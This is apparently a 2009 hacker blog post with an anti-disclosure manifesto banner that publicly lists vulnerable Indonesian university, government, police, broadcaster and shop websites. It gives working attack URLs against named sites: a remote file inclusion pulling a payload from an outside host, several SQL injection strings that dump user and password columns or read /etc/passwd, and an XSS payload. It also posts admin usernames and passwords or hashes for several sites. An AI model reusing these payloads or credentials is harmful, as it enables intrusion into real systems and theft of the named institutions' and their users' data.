_____ __ _____ ___ _____ ___ _____ _____ _____ _____ _____ _____ _____ _____ ____ _____ _ _ _ _____ | __|| | | | ||_ | | | || | | | __|| __|| __ || | || __|| __ | | || __| | \ | || | | || | | | __|| |__ | | | _| |_ | | | ||_ | |__ || __|| -|| | || __|| -| |- -||__ | | | || | || | | || | | | |_____||_____| \___/ |_____||_|___| |_| |_____||_____||__|__| \___/ |_____||__|__| |_____||_____| |____/ |_____||_____||_|___| I DONT WANT TO BE FAME , I DONT WANT TO BE ANY EZINE , I JUST WANT TO SHARE KNOWLEDGE
, ----. ~ Fuck full-disclosure - - ` ~ Fuck the security industry ,__.,' \ ~ Keep 0days private .' *` ~ Hack everyone you can and then hack some more / | | / **\ ~ Blend in. . / ****. ~ Get trusted. | mm | ****| ~ Trust no one. \ | ****| ~ Own everyone. ` ._______ \ ****/ ~ Disclose nothing. \ /`---' ~ Destroy everything. \___( ~ Take back the scene /~~~~\ ~ Never sell out, never surrender. / \ ~ Get in as anonymous, Leave with no trace. / | \ ~ This your Fucking IP | | \ ~ This your Fucking ISP , ~~ . |, ~~ . | |\ ~ FUCK OFF I've got enough friends !!!! ( |||| ) ( |||| )(,,,)` ( |||||| )-( |||||| ) | ^ ( |||||| ) ( |||||| ) |'/ ( |||||| )-( |||||| )___,'- ( |||| ) ( |||| ) ` ~~ ' ` ~~ '

[ Blog ]

[ History ]


Again, Indonesia Admin Site System Can not Fix The Vulnerability

It's almost 2 year Vuln On Multiple Sites University of Indonesia, and yet the government fix,
Where Are you Admin?
Relax and Sleep That You Work.
hmm ...
Maybe You Never Know The existence of attack that can be done by outsiders, Like Doing Data Manipulation, Changing Views, Even Removing All Server Data Until You Server will be Down,

Look here some sensitive cases,

======================
# Indonesian University Site #
======================

http://www.akademik.pasca.unpad.ac.id/
http://www.pps.fisip.unpad.ac.id/
http://www.uinjkt.ac.id/
http://www.unhas.ac.id/
http://www.unikom.ac.id/
http://www.upi.ac.id/
http://www.trisakti.ac.id/
http://ftip.unpad.ac.id
======================

Example ::

[universitas padjajaran bandung]

http://akademik.pasca.unpad.ac.id/
=======================================================
Nama Server: Apache/2.2.3 (Fedora). PHP/5.1.6
System : Linux pps2.unpad.ac.id 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:37:32 EDT 2006 i686
uid=48(apache) gid=48(apache) groups=48(apache)
========================================================

If That Site Have Bugs, ,, Whats Next ?? Wannabe :)) LoL .
-> RFI ATTACK
========================================================
http://akademik.pasca.unpad.ac.id/pasca/index.php?dir=http://www.a1e.es/templates/beez/vina.txt??
========================================================
Belive Me , this Site Have Been Powned .
Like This

http://akademik.pasca.unpad.ac.id/daftar_ver1/dir_uploads/waw.txt

Woo00psss...
I can make a student value manipulation, even I can make this site down..


Example II

http://www.trisakti.ac.id

username : admin
password : 662d187d55d6c5491f6619d99971dc74
email : admin@trisakti.ac.id


Example III

http://www.stikom.edu

http://www.stikom.edu/v8/main.php?act=inf&goto=agd&id=-231+union+select+all+null,null,null,concat%28LOGIN,char%2858%29,PASSWD%29,EMAIL,null+from+user--


=======================================================
Ok Lets Tested Some Goverment Site ;)
=======================================================

http://Jakarta.go.id
http://bandung.go.id
http://utara.jakarta.go.id
http://kpu.go.id
http://www.djfm.co.id
http://www.petrokimia-gresik.com
http://www.ali.web.id
http://www.corbuziershop.com/

=======================================================
Example ::

http://Jakarta.go.id

Joomla --"

Lets see :

http://www.jakarta.go.id/v62/hah.txt

=======================================================
ok Lets Tested Entertaiment Site
=======================================================

www.indosiar.com
www.rcti.tv
www.an.tv
www.antvsports.com
www.sctv.co.id

=======================================================

Example ::

ANTV SITE
www.an.tv (SQLi)

http://www.an.tv/s/index.php?sid=5+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764),1--

http://www.an.tv/s/index.php?sid=5+AND+1=2+UNION+SELECT+concat(user,0x3a,password),1+FROM+mysql.user--

Lets See ..
Whats Next ?? Wannabe ? Lol :))

if you hate this site , i'll give you free...
taste it
======================
http://www.an.tv/cms

username : administrator
password : admin!@#123
email : nini@an.tv
======================
http://antvsports.com/cms

username : admin
password : admin123

======================

http://ww1.indosiar.com/investor/admin/

uname : admininvestor
password : password


======================================================
Lets Test The Comercial Site
======================================================

http://www.corbuziershop.com
http://www.wtcsby.com
http://www.fajar.co.id
http://www.jamsostek.co.id/
http://bjh.co.id/
=====================================================

example : corbuziershop.com (SQLi)

http://www.corbuziershop.com/shop/index.php?page=showproduct&id=-362+AND+1=2+UNION+SELECT+null,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*


example II : trubus

http://www.trubus-online.co.id/mod.php?mod=publisher&op=viewarticle&cid=4&artid=-1190%20union%20select%201,2,3,4,5,group_concat%28name,0x3a,pwd%29,7,8,9,10%20from%20authors--

example III : balita

http://info.balitacerdas.com/mod.php?mod=publisher&op=viewarticle&artid=-45%20union%20select%201,2,3,version%28%29,5,group_concat%28name,0x3a,pwd%29,7,8,9,10,11%20from%20authors--

example 4 :

http://www.tigapilar.org/mod.php?mod=publisher&op=viewarticle&cid=5&artid=-762%20union%20select%201,2,3,4,5,group_concat(name,0x3a,pwd),7,8,9,10%20from%20authors--

=======================================================
Ok Lets Test Goverment Police Site
======================================================
http://polri.go.id
http://lodaya.web.id
http://interpol.go.id
http://tni.mil
http://www.lantas.metro.polri.go.id
======================================================

Lets See ..

www.polri.go.id ( XSS )

http://www.polri.go.id/indexwide.php?op=perundangan&type=00&subtype=1%3E%22%3E%3CScRiPt%20%0D%0A%3Ealert%28440221011283%29%3B%3C/ScRiPt%3E




Next Lantas Polri
Taste ByYourself

http://www.lantas.metro.polri.go.id/intranet/
Username : Xploit
password : Xploit00

=====================================================

iam sorry iam not hacker too, but i wanna be ^_^
Maybe It is a little example, which can be used as a lesson for all.
For More Information , Please Contact Me , Feel Free !!


Thnx

./elv1n4

Labels:


On 11/4/09 at 12:16 AM



My Profile:


Biography:

short story:

[ Friends Link ]

[ chat with me ]


[ archives ]

[ Notices ]

By title

Again, Indonesia Admin Site System Can not Fix The Vulnerability

By month

2002.03 2002.12 2005.12 2008.11 2009.02 2009.03 2009.04 2009.05 2009.06 2009.07 2009.08 2009.09 2009.10 2009.11 2009.12 2010.01 2010.03



 


elv1n4 Themes v2.0.0 © 2009 by elv1n4

www[dot]elv1n4.anti-sec[dot]org